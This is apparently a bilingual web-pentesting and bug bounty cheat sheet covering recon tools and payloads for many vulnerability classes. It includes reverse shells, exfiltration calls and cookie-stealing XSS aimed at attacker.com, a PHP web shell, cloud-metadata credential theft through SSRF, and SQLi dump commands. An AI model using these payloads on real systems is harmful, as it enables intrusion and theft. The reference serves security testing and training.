Dokumentasi lengkap untuk web application security testing dan bug bounty hunting
- Enumeration
- WebApp Pentest
- Attack Surface Recon
- Subdomain Discovery
- Subdomain Takeover
- Port Scanning
- Content Discovery
- Parameters
- Vulnerability Scanners
- GitHub Recon
- Nuclei AI
- Shodan Dorking
- All CMS
- Open Redirect
- Authentication Vulnerabilities
- Directory Traversal
- OS Command Injection
- Business Logic Vulnerabilities
- Information Disclosure
- Access Control Vulnerabilities
- File Upload Vulnerabilities
- XXE
- XSS Cross Site Scripting
- SQLi
- JWT
- HTTP Host Header
- WebSocket
- DOM Based Vulnerabilities
- Clickjacking
- CORS
- CSRF
- SSRF
- Tools
Deskripsi: Fase awal pengumpulan informasi tentang target untuk memahami infrastruktur, teknologi, dan potential attack vectors.
- Passive reconnaissance (OSINT)
- Active reconnaissance (direct interaction)
- Service identification
- Technology stack fingerprinting
# Whois lookup
whois target.com
# DNS enumeration
nslookup target.com
dig target.com ANY
# Email harvesting
theHarvester -d target.com -b all
# ASN lookup
whois -h whois.radb.net AS[NUMBER]- Domain registration info
- DNS records (A, AAAA, MX, TXT, NS)
- Email addresses & employees
- IP ranges & ASN
- Organization structure
Deskripsi: Framework sistematis untuk testing keamanan aplikasi web secara menyeluruh dari berbagai aspek.
- Information Gathering - Mapping aplikasi
- Configuration & Deployment - Identifikasi misconfig
- Identity Management - Testing autentikasi
- Authorization - Testing otorisasi
- Session Management - Testing session handling
- Input Validation - Testing injection flaws
- Error Handling - Information leakage
- Cryptography - Weak crypto implementation
- Business Logic - Logic flaws
- Client-Side - DOM, XSS, clickjacking
- Follow OWASP Testing Guide v4.2
- OWASP Top 10 checklist
- ASVS (Application Security Verification Standard)
Deskripsi: Mapping seluruh permukaan serangan untuk mengidentifikasi semua entry points dan potential vulnerabilities.
- Web Applications - Main & sub applications
- APIs - REST, GraphQL, SOAP endpoints
- Mobile Apps - Android & iOS
- Third-party Integrations - External services
- Cloud Services - S3, Azure Storage, etc.
# Asset discovery
amass enum -d target.com
# Technology detection
whatweb target.com
wappalyzer
# JavaScript analysis
subjs -i urls.txt | hakrawler- All subdomains mapped
- All ports & services identified
- All URLs & endpoints discovered
- Technology stack documented
- Third-party services identified
Deskripsi: Menemukan semua subdomain dari target untuk memperluas attack surface dan menemukan forgotten/unmaintained assets.
# Certificate transparency
crt.sh
certspotter
# DNS aggregators
subfinder -d target.com
assetfinder -subs-only target.com
amass enum -passive -d target.com# DNS bruteforce
puredns bruteforce wordlist.txt target.com -r resolvers.txt
# Permutation
dnsgen domains.txt | massdns -r resolvers.txt -o S
# Reverse DNS
prips 1.2.3.0/24 | hakrevdns -d target.com# Check alive subdomains
httpx -l subdomains.txt -o alive.txt
# Screenshot
gowitness file -f alive.txtDeskripsi: Vulnerability dimana subdomain mengarah ke service yang sudah tidak aktif, memungkinkan attacker mengambil alih subdomain tersebut.
- GitHub Pages
- Heroku
- AWS S3
- Azure
- Shopify
- Tumblr
- WordPress.com
- And many more...
# Automated scanning
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt
subzy -targets subdomains.txt
# Nuclei templates
nuclei -l subdomains.txt -t subdomain-takeover/- Check CNAME records
- Verify service response
- Attempt registration
- Confirm takeover
GitHub Pages: "There isn't a GitHub Pages site here"
Heroku: "No such app"
S3: "NoSuchBucket"
Azure: "404 Web Site not found"
Deskripsi: Identifikasi port yang terbuka dan service yang berjalan untuk menemukan potential entry points.
# Quick scan
nmap -F target.com
# Full TCP scan
nmap -p- target.com
# Service version detection
nmap -sV -sC target.com
# Aggressive scan
nmap -A -T4 target.com
# Mass scanning
masscan -p1-65535 target.com --rate=100020,21 - FTP
22 - SSH
23 - Telnet
25 - SMTP
53 - DNS
80,443 - HTTP/HTTPS
3306 - MySQL
5432 - PostgreSQL
6379 - Redis
27017 - MongoDB
8080,8443 - HTTP Alternative
Deskripsi: Menemukan hidden directories, files, dan endpoints yang tidak terlink secara publik.
# Directory bruteforce
ffuf -w wordlist.txt -u https://target.com/FUZZ
# Recursive discovery
feroxbuster -u https://target.com -w wordlist.txt
# Content discovery
dirsearch -u https://target.com -e php,html,js
# Gobuster
gobuster dir -u https://target.com -w wordlist.txt- SecLists/Discovery/Web-Content/
- common.txt
- directory-list-2.3-medium.txt
- raft-large-files.txt
/admin, /administrator
/backup, /backups, .bak
/config, /configuration
/api, /v1, /v2
/test, /dev, /staging
/.git, /.svn, /.env
/phpinfo.php
/robots.txt, /sitemap.xml
Deskripsi: Discovering dan testing parameter yang digunakan aplikasi untuk menemukan injection points dan logic flaws.
# From URLs
arjun -u https://target.com/page
# From JavaScript
getallurls target.com | grep "?"
subjs -i urls.txt
# Parameter mining
paramspider -d target.com- GET parameters - URL query strings
- POST parameters - Form data
- JSON parameters - API requests
- XML parameters - SOAP/XML APIs
- Cookies - Session & tracking
- Headers - Custom headers
# Parameter fuzzing
ffuf -u https://target.com/?FUZZ=value -w params.txt
# Parameter pollution
param=value¶m=value2
# Parameter manipulation
id=1 → id=2, id=-1, id=0, id=999999Deskripsi: Automated tools untuk scanning vulnerabilities secara cepat dan efisien.
# Nuclei - Template based
nuclei -l urls.txt -t cves/ -t vulnerabilities/
# Nikto - Web server scanner
nikto -h target.com
# WPScan - WordPress scanner
wpscan --url target.com --api-token YOUR_TOKEN
# Nessus - Comprehensive scanner
# (GUI-based)
# Acunetix - Commercial scanner
# (GUI-based)# Nuclei custom templates
nuclei -l urls.txt -t custom-template.yaml
# Jaeles scanning
jaeles scan -u https://target.comDeskripsi: Mencari sensitive information dan credentials yang ter-leak di GitHub repositories.
# Organization repos
org:target
# Code search
target.com password
target.com api_key
target.com secret_key
target.com access_token
# Specific files
filename:.env target.com
filename:config.php target.com
extension:pem target.com
# GitDorker
python3 GitDorker.py -tf token.txt -d dorks.txt -o results.txt
# Gitrob
gitrob -github-access-token TOKEN org_name
# TruffleHog
trufflehog git https://github.com/target/repo- API keys & tokens
- Database credentials
- AWS keys
- Private keys
- Configuration files
- Internal URLs
- Employee information
Deskripsi: Menggunakan Nuclei templates dengan AI-powered scanning untuk vulnerability detection yang lebih intelligent.
# Install
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
# Update templates
nuclei -update-templates
# Basic scan
nuclei -u https://target.com
# Template-based scan
nuclei -l urls.txt -t cves/ -t vulnerabilities/
# Severity filtering
nuclei -l urls.txt -severity critical,high- CVEs
- Vulnerabilities
- Exposures
- Misconfigurations
- Technologies
- Fuzzing
- Workflows
id: custom-check
info:
name: Custom Vulnerability Check
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/vulnerable-endpoint"
matchers:
- type: word
words:
- "vulnerability indicator"Deskripsi: Menggunakan Shodan search engine untuk menemukan exposed services dan vulnerable systems.
# By organization
org:"Target Inc"
# By hostname
hostname:target.com
# By technology
product:"Apache httpd"
# Webcams
title:"IP Webcam"
# Databases
port:3306 product:MySQL
port:27017 product:MongoDB
# Default credentials
authentication disabled
# Specific CVEs
vuln:CVE-2021-44228
# Search
shodan search "org:Target"
# Host information
shodan host 1.2.3.4
# Download results
shodan download results "hostname:target.com"# Using multiple free accounts
# Rotate API keys
# Use shodan-python library with proxy
# Alternative: Censys
censys search "target.com"Deskripsi: Testing untuk Content Management Systems (WordPress, Joomla, Drupal, dll).
# WPScan
wpscan --url target.com --enumerate u,p,t --api-token TOKEN
# Common vulns
/wp-admin/ - Admin panel
/wp-content/uploads/ - File upload
/xmlrpc.php - XML-RPC
/wp-json/ - REST API# JoomScan
joomscan -u target.com
# Common paths
/administrator/ - Admin panel
/configuration.php - Config file# Droopescan
droopescan scan drupal -u target.com
# Common vulns
Drupalgeddon (CVE-2018-7600)- Magento - Magento Scanner
- Shopify - Shopify specific tests
- Ghost - Check version & vulns
- Strapi - API vulnerabilities
Deskripsi: Vulnerability yang memungkinkan attacker redirect user ke external malicious site melalui trusted domain.
?url=
?redirect=
?next=
?return=
?continue=
?dest=
?redirect_uri=
?callback=
?jump=
?target=
# Basic
https://target.com/redirect?url=https://evil.com
# Double encoding
https://target.com/redirect?url=https%253A%252F%252Fevil.com
# Protocol handlers
javascript:alert(1)
data:text/html,<script>alert(1)</script>
# Bypass filters
//evil.com
///evil.com
////evil.com
https:evil.com
https:/evil.com
# Whitelisting bypass
https://target.com@evil.com
https://evil.com.target.com
https://target.com.evil.com- Phishing attacks
- OAuth token theft
- Session hijacking
Deskripsi: Kelemahan dalam mekanisme autentikasi yang memungkinkan unauthorized access.
- Weak Passwords - Brute force
- Default Credentials - admin/admin
- Password Reset Flaws - Token manipulation
- 2FA Bypass - Response manipulation
- Session Fixation - Session manipulation
- Credential Stuffing - Leaked credentials
[ ] Brute force protection
[ ] Password complexity
[ ] Account lockout mechanism
[ ] Password reset security
[ ] 2FA implementation
[ ] Session management
[ ] OAuth/SSO vulnerabilities
[ ] Remember me functionality
# Brute force
hydra -L users.txt -P passwords.txt target.com http-post-form
# 2FA bypass
- Response manipulation
- Code reuse
- Rate limit bypass
- Backup codes
# Password reset
- Token prediction
- Token not expiring
- No rate limitingDeskripsi: Vulnerability yang memungkinkan attacker mengakses file dan directory di luar web root directory.
../
../../
../../../etc/passwd
....//....//....//etc/passwd
..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f
%2e%2e/
..%2f
%2e%2e%5c
%252e%252e%252f
%252e%252e/
..%252f
/etc/passwd
/etc/shadow
C:\Windows\System32\config\SAM
C:\Windows\win.ini
/proc/self/environ
/var/log/apache2/access.log
# Null byte
../../etc/passwd%00
# Nested traversal
....//....//etc/passwd
# Absolute path
/etc/passwd
# Windows
..\..\..\..\windows\system32\drivers\etc\hosts
Deskripsi: Vulnerability yang memungkinkan attacker execute arbitrary OS commands pada server.
- User input yang diproses oleh system()
- Shell commands
- Subprocess execution
- External program calls
# Unix/Linux
; ls
| ls
|| ls
& ls
&& ls
`ls`
$(ls)
# Blind injection
; sleep 10
; ping -c 10 attacker.com
# Windows
& dir
&& dir
| dir
|| dir# Information gathering
whoami
id
uname -a
cat /etc/passwd
ifconfig
# Reverse shell
bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc -e /bin/sh attacker.com 4444# Time-based detection
; sleep 10 &
# Out-of-band detection
; nslookup $(whoami).attacker.com &
# Blind exploitation
; curl http://attacker.com/$(whoami) &Deskripsi: Flaws dalam design dan implementation business logic yang dapat disalahgunakan attacker.
- Price Manipulation - Negative values, tampering
- Race Conditions - Concurrent requests
- Workflow Bypass - Skip payment steps
- Insufficient Process Validation - Missing checks
- Excessive Trust - Client-side validation only
# Price manipulation
POST /checkout
amount=-100
# Race condition
# Multiple parallel requests to redeem coupon
# Workflow bypass
# Direct access to /order-complete
# Parameter tampering
user_id=1 → user_id=2
role=user → role=admin
- Map business flows
- Identify critical actions
- Test boundary conditions
- Manipulate parameters
- Test state transitions
- Race condition testing
Deskripsi: Unintentional exposure of sensitive information yang dapat membantu attacker.
- Error Messages - Stack traces, debug info
- Comments in Source - Credentials, internal IPs
- Backup Files - .bak, .old, ~
- Version Information - Software versions
- Directory Listings - Autoindex enabled
- API Responses - Verbose errors
# Error messages
500 Internal Server Error with stack trace
# Source code comments
<!-- Admin password: secretpass -->
# Backup files
/config.php.bak
/database.sql.old
/.git/
/.env
# Headers
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/7.4.3
# Robots.txt
Disallow: /admin-secret/# Dirsearch
dirsearch -u target.com -e bak,old,txt,zip
# Wayback Machine
waybackurls target.com | grep -E "\.bak|\.old|\.zip"Deskripsi: Kelemahan dalam enforcement authorization yang memungkinkan unauthorized actions.
- Vertical Privilege Escalation - User → Admin
- Horizontal Privilege Escalation - User A → User B
- IDOR - Insecure Direct Object Reference
- Missing Function Level Access Control
- Forced Browsing
# User profile
/user/profile?id=123 → id=124
# Order details
/order?order_id=1000 → order_id=1001
# File access
/download?file=user123.pdf → file=user124.pdf
# API endpoints
GET /api/users/123 → /api/users/124[ ] Test with different user roles
[ ] Manipulate object references
[ ] Test direct URL access
[ ] Check API endpoints authorization
[ ] Test parameter manipulation
[ ] Cross-account testing
Deskripsi: Vulnerability yang memungkinkan attacker upload malicious files ke server.
- Unrestricted Upload - No filtering
- Extension Bypass - .php5, .phtml
- Content-Type Bypass - Modify header
- Double Extension - file.php.jpg
- Null Byte Injection - file.php%00.jpg
# Web shells
.php, .jsp, .asp, .aspx
# Server-side scripts
.py, .pl, .rb
# Client-side
.html, .svg (XSS)
# Archives
.zip, .tar (path traversal)# Extension bypass
shell.php5
shell.phtml
shell.php.jpg
# Content-Type manipulation
Content-Type: image/jpeg
(but contains PHP code)
# Magic bytes
Add GIF89a to beginning of PHP file
# Case manipulation
shell.PhP
shell.pHp// Simple web shell
<?php system($_GET['cmd']); ?>
// Upload via cURL
curl -F "file=@shell.php" https://target.com/uploadDeskripsi: XML External Entity injection vulnerability yang memungkinkan attacker read files, SSRF, dan denial of service.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
<data>&xxe;</data>
</root><?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
<root></root><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/admin">]>
<root>&xxe;</root># Local file read
file:///etc/passwd
file:///c:/windows/win.ini
# SSRF
http://localhost:8080/admin
http://169.254.169.254/latest/meta-data/
# PHP wrappers
php://filter/convert.base64-encode/resource=/etc/passwd
Deskripsi: Injection vulnerability yang memungkinkan attacker execute malicious scripts di browser victim.
- Reflected XSS - Payload di URL/input
- Stored XSS - Tersimpan di database
- DOM-based XSS - Client-side script vulnerable
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)">
<body onload=alert(1)># Case manipulation
<ScRiPt>alert(1)</sCrIpT>
# Encoding
<script>alert(1)</script>
%3Cscript%3Ealert(1)%3C/script%3E
# Alternative tags
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
# Event handlers
<input autofocus onfocus=alert(1)>
<select onfocus=alert(1) autofocus>// Cookie stealing
<script>
fetch('https://attacker.com/?c='+document.cookie)
</script>
// Keylogger
<script>
document.onkeypress=function(e){
fetch('https://attacker.com/?k='+e.key)
}
</script>
// BeEF hook
<script src="http://attacker.com/hook.js"></script>Deskripsi: SQL Injection vulnerability yang memungkinkan attacker manipulate database queries.
- Error-based - Error messages reveal data
- Union-based - UNION SELECT for data extraction
- Blind SQLi - Boolean/Time-based
- Out-of-band - DNS/HTTP exfiltration
# Simple tests
' OR '1'='1
' OR 1=1--
" OR "1"="1
') OR ('1'='1
# Error detection
'
"
`
')
")
`)# Find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- (error = 2 columns)
# Union injection
' UNION SELECT NULL,NULL--
' UNION SELECT 'a','b'--
' UNION SELECT username,password FROM users--# Boolean-based
' AND 1=1-- (True)
' AND 1=2-- (False)
# Time-based
' AND SLEEP(5)--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
# Substring extraction
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--# SQLMap
sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D database --tables
sqlmap -u "http://target.com/page?id=1" -D database -T users --dumpDeskripsi: JSON Web Token vulnerabilities yang dapat menyebabkan authentication bypass dan privilege escalation.
header.payload.signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
- None Algorithm - alg: none
- Weak Secret - Brute force HMAC
- Algorithm Confusion - RS256 → HS256
- Kid Parameter Injection - Path traversal
- JKU/X5U Header Injection - SSRF
# None algorithm
{
"alg": "none",
"typ": "JWT"
}
# Weak secret brute force
hashcat -m 16500 jwt.txt wordlist.txt
# Algorithm confusion
# Change alg from RS256 to HS256
# Sign with public key as secret
# Kid injection
"kid": "../../dev/null"
# JKU injection
"jku": "http://attacker.com/jwks.json"# JWT Tool
python3 jwt_tool.py TOKEN
# Decode
jwt.ioDeskripsi: Vulnerability yang muncul dari improper validation HTTP Host header.
- Password Reset Poisoning - Malicious reset link
- Web Cache Poisoning - Inject malicious content
- SSRF - Access internal resources
- Virtual Host Routing Bypass - Access restricted vhosts
# Basic injection
Host: evil.com
# Port injection
Host: target.com:evil.com
# Absolute URL
GET https://target.com/ HTTP/1.1
Host: evil.com
# Duplicate headers
Host: target.com
Host: evil.com
# X-Forwarded-Host
X-Forwarded-Host: evil.com
# X-Host
X-Host: evil.comPOST /forgot-password HTTP/1.1
Host: evil.com
Content-Type: application/x-www-form-urlencoded
email=victim@target.com
# Reset link akan ke: http://evil.com/reset?token=...Deskripsi: Testing WebSocket connections untuk security vulnerabilities.
- Cross-Site WebSocket Hijacking (CSWSH)
- Missing Authentication
- Injection Attacks
- Message Tampering
// Connect to WebSocket
const ws = new WebSocket('wss://target.com/ws');
// Test CSWSH
ws.onopen = function() {
ws.send('sensitive_command');
};
ws.onmessage = function(event) {
console.log('Received:', event.data);
};<!-- Attacker page -->
<script>
var ws = new WebSocket('wss://target.com/ws');
ws.onopen = function() {
ws.send('{"action":"get_sensitive_data"}');
};
ws.onmessage = function(e) {
fetch('https://attacker.com/?data=' + e.data);
};
</script># Burp Suite WebSocket support
# OWASP ZAP WebSocket testing
# wscat - WebSocket client
wscat -c wss://target.com/wsDeskripsi: Client-side vulnerabilities yang terjadi dalam Document Object Model (DOM).
- DOM XSS - JavaScript execution
- DOM-based Open Redirect
- Client-side SQL Injection
- WebSocket-URL Poisoning
document.URL
document.documentURI
document.baseURI
location.href
location.search
location.hasheval()
setTimeout()
setInterval()
document.write()
element.innerHTML// Vulnerable code
var search = location.search.substring(1);
document.write(search);
// Attack
https://target.com/page?search=<script>alert(1)</script>
# Detection
# Analyze JavaScript source code
# Trace data flow from source to sink
# Test with payloads# DOM Invader (Burp Suite extension)
# DOMPurify - Testing sanitization
# Manual code reviewDeskripsi: UI redressing attack yang menipu user untuk click pada hidden elements.
Overlay transparent iframe di atas legitimate website untuk mencuri clicks.
<!DOCTYPE html>
<html>
<head>
<title>Clickjacking Demo</title>
<style>
iframe {
position: absolute;
width: 500px;
height: 500px;
opacity: 0.0001;
z-index: 2;
}
button {
position: absolute;
top: 100px;
left: 100px;
z-index: 1;
}
</style>
</head>
<body>
<button>Click for FREE iPhone!</button>
<iframe src="https://target.com/delete-account"></iframe>
</body>
</html># Multistep clickjacking
# Drag & drop clickjacking
# Touch-based clickjacking (mobile)
# Likejacking (Facebook)
<iframe src="https://facebook.com/like-page"></iframe># Check for headers
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'none'# Double iframe
# Sandbox attribute manipulation
# Browser-specific bypasses
Deskripsi: Cross-Origin Resource Sharing misconfigurations yang memungkinkan unauthorized cross-origin requests.
# Reflect Origin
Access-Control-Allow-Origin: [reflected from Origin header]
Access-Control-Allow-Credentials: true
# Null origin
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
# Wildcard with credentials (not allowed but some implement wrong)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
# Subdomain wildcards
Access-Control-Allow-Origin: *.target.com# Test with different origins
curl -H "Origin: https://evil.com" https://target.com/api/data
# Check response headers
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true<!-- Attacker page: evil.com -->
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
fetch('https://attacker.com/?data=' + xhr.responseText);
}
}
xhr.open('GET', 'https://target.com/api/sensitive-data', true);
xhr.withCredentials = true;
xhr.send();
</script><iframe sandbox="allow-scripts" src="data:text/html,
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://target.com/api/data', true);
xhr.withCredentials = true;
xhr.onload = function() {
parent.postMessage(xhr.responseText, '*');
};
xhr.send();
</script>"></iframe>1. Reflecting arbitrary origins
2. Accepting null origin
3. Weak regex validation (evil-target.com)
4. Insecure subdomain wildcards
5. Pre-domain wildcard (*.target.com matches eviltarget.com)
Deskripsi: Cross-Site Request Forgery attack yang memaksa authenticated user melakukan unwanted actions.
- Relevant action (change password, transfer money)
- Cookie-based authentication
- No unpredictable parameters
- No CSRF protection
<!-- GET-based CSRF -->
<img src="https://target.com/change-email?email=attacker@evil.com">
<!-- POST-based CSRF -->
<form action="https://target.com/change-password" method="POST">
<input type="hidden" name="new_password" value="hacked123">
<input type="submit" value="Click here">
</form>
<script>
document.forms[0].submit();
</script><form action="https://target.com/api/update" method="POST" enctype="text/plain">
<input name='{"email":"attacker@evil.com","role":"admin","ignore":"' value='"}' type='hidden'>
</form>
<script>
document.forms[0].submit();
</script>// crossdomain.xml allows custom headers
URLRequest req = new URLRequest("https://target.com/api");
req.method = "POST";
req.requestHeaders.push(new URLRequestHeader("X-CSRF-Token", "stolen-token"));# Missing token validation
# Token not tied to user session
# Token in cookie instead of header
# Accepting GET for state-changing actions
# Weak token generation
# Clickjacking + CSRF combo[ ] Remove CSRF token parameter
[ ] Use another user's CSRF token
[ ] Change request method (POST → GET)
[ ] Remove token from request entirely
[ ] Test with blank token value
[ ] Use same token twice
[ ] Test with different Content-Type
Deskripsi: Server-Side Request Forgery yang memungkinkan attacker make requests from server ke internal/external resources.
url=
uri=
path=
dest=
redirect=
next=
data=
reference=
site=
html=
# Access internal services
http://localhost
http://127.0.0.1
http://0.0.0.0
http://[::1]
# Internal IP ranges
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/# Get IAM credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[role-name]
# Get user data
http://169.254.169.254/latest/user-data/# IP encoding
http://2130706433 (decimal)
http://0x7f000001 (hex)
http://0177.0.0.1 (octal)
# DNS rebinding
http://ssrf.localdomain (resolves to 127.0.0.1)
# URL bypass
http://127.1
http://localhost.evil.com
http://evil.com#@target.com
http://target.com@evil.com
# Protocol smuggling
dict://localhost:11211/stats
gopher://localhost:6379/_SET%20KEY%20VALUE
file:///etc/passwd
# Redirect bypass
http://evil.com/redirect-to-localhost# Time-based detection
http://internal-service (slow response)
# Out-of-band detection
http://burpcollaborator.net
http://attacker.com/$(whoami)
# DNS exfiltration
http://$(whoami).attacker.com# Read local files
file:///etc/passwd
file:///c:/windows/win.ini
# Port scanning
http://internal-network:22
http://internal-network:80
http://internal-network:443
# Protocol smuggling
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
dict://127.0.0.1:11211/stats- Access internal services
- Cloud metadata theft
- Read local files
- Port scanning internal network
- RCE via protocol smuggling
- Bypass firewall restrictions
Deskripsi: Collection of online tools dan websites yang berguna untuk penetration testing.
# DNS & Domain
- dnsdumpster.com - DNS recon & mapping
- securitytrails.com - DNS history & WHOIS
- viewdns.info - Multiple DNS tools
- crt.sh - Certificate transparency
# Search Engines
- shodan.io - IoT & service search
- censys.io - Internet-wide scanning
- zoomeye.org - Cyberspace search
- fofa.so - Asset search
# OSINT
- hunter.io - Email finder
- phonebook.cz - OSINT tool
- intelx.io - Intelligence search
- dehashed.com - Breach data
# Subdomain Discovery
- subdomainfinder.c99.nl
- pentest-tools.com/information-gathering/find-subdomains-of-domain
- spyse.com
- riddler.io
# Wayback Machine
- web.archive.org
- archive.is
- urlscan.io
# Web Scanners
- pentest-tools.com
- hackertarget.com
- intruder.io
- detectify.com
# SSL/TLS Testing
- ssllabs.com/ssltest
- testssl.sh (online version)
- htbridge.com/ssl
# Security Headers
- securityheaders.com
- observatory.mozilla.org
# General
- cyberchef.org - Swiss army knife
- base64decode.org
- urldecoder.org
- hashkiller.io
# JWT
- jwt.io - JWT decoder
- token.dev - JWT debugger
# Hash Analysis
- crackstation.net
- hashes.com
- cmd5.org
# XSS
- xsshunter.com - Blind XSS
- xss.js.org - XSS payloads
- portswigger.net/web-security/cross-site-scripting/cheat-sheet
# SQL Injection
- sqlmap.org
- portswigger.net/web-security/sql-injection/cheat-sheet
# Command Injection
- revshells.com - Reverse shell generator
- reverse-shell.sh - Shell commands
# Request Inspection
- webhook.site - Instant URLs
- requestbin.com
- beeceptor.com
- pipedream.com
# Burp Collaborator Alternatives
- interact.sh
- burpcollaborator.net
- canarytokens.org
# File Sharing
- file.io - Temporary file sharing
- transfer.sh
- tmpfiles.org
# Vulnerability DBs
- exploit-db.com
- cvedetails.com
- nvd.nist.gov
- vuldb.com
# Exploit Search
- sploitus.com
- packetstormsecurity.com
- rapid7.com/db
# REST API
- reqbin.com - API tester
- hoppscotch.io - API client
- apitester.com
# GraphQL
- graphql-playground.com
- altair.sirmuel.design
# Hash Identification
- tunnelsup.com/hash-analyzer
- onlinehashcrack.com
# Encryption/Decryption
- cryptii.com
- dcode.fr
- quipqiup.com (cipher solver)
# Deobfuscation
- beautifier.io - JavaScript beautifier
- jsnice.org - JS deobfuscator
- deobfuscate.io
# Decompilers
- dogbolt.org - Multi-decompiler
- decompiler.com
# Android
- apkpure.com - APK downloads
- apkcombo.com
- apkmirror.com
# Analysis
- virustotal.com
- hybrid-analysis.com
- any.run
# Port Scanning
- hackertarget.com/nmap-online-port-scanner
- pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
# Whois
- whois.domaintools.com
- who.is
- lookup.icann.org
# Wordlist Collections
- github.com/danielmiessler/SecLists
- wordlists.assetnote.io
- github.com/fuzz-security
# Password Lists
- weakpass.com
- crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
# Templates
- pentestreports.com
- github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report
- offensive-security.com/reports/sample-penetration-testing-report.pdf
# Screenshot Tools
- prnt.sc
- lightshot.com
- flameshot.org (desktop)
# Training Platforms
- portswigger.net/web-security
- hackerone.com/hacktivity
- bugcrowd.com/resources
- pentesterlab.com
# Practice Labs
- hackthebox.eu
- tryhackme.com
- pentesterlab.com
- overthewire.org
# Essential Extensions
- Wappalyzer - Technology detection
- Cookie-Editor - Cookie manipulation
- User-Agent Switcher
- FoxyProxy - Proxy management
- Hack-Tools - Pentest toolkit
# API Security
- apisecurity.io
- owasp.org/www-project-api-security
# Pipeline Integration
- snyk.io
- dependabot.com
- sonarqube.org
- HackerOne - hackerone.com
- Bugcrowd - bugcrowd.com
- Intigriti - intigriti.com
- YesWeHack - yeswehack.com
- Synack - synack.com
- Twitter #bugbounty #bugbountytips
- Reddit r/bugbounty r/netsec
- Discord servers (Nahamsec, etc.)
- YouTube channels (STÖK, InsiderPhD, Nahamsec)
- OWASP Testing Guide
- OWASP Top 10
- PTES (Penetration Testing Execution Standard)
- NIST Guidelines
Feel free to contribute to this GitBook by:
- Submitting pull requests
- Reporting issues
- Suggesting new techniques
- Sharing real-world examples
Usage of all tools/scripts on this site for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
I assume no liability and am not responsible for any misuse or damage caused by this site. The resources I have used are too many to count and I am grateful and proud to be part of a community where knowledge is not hoarded but shared for the common good.
"If I have seen further it is by standing on the shoulders of Giants"
This documentation is provided for educational purposes only. Always ensure you have proper authorization before testing any systems.
Last Updated: 2025
Maintained by: [Your Name/Team]
Version: 1.0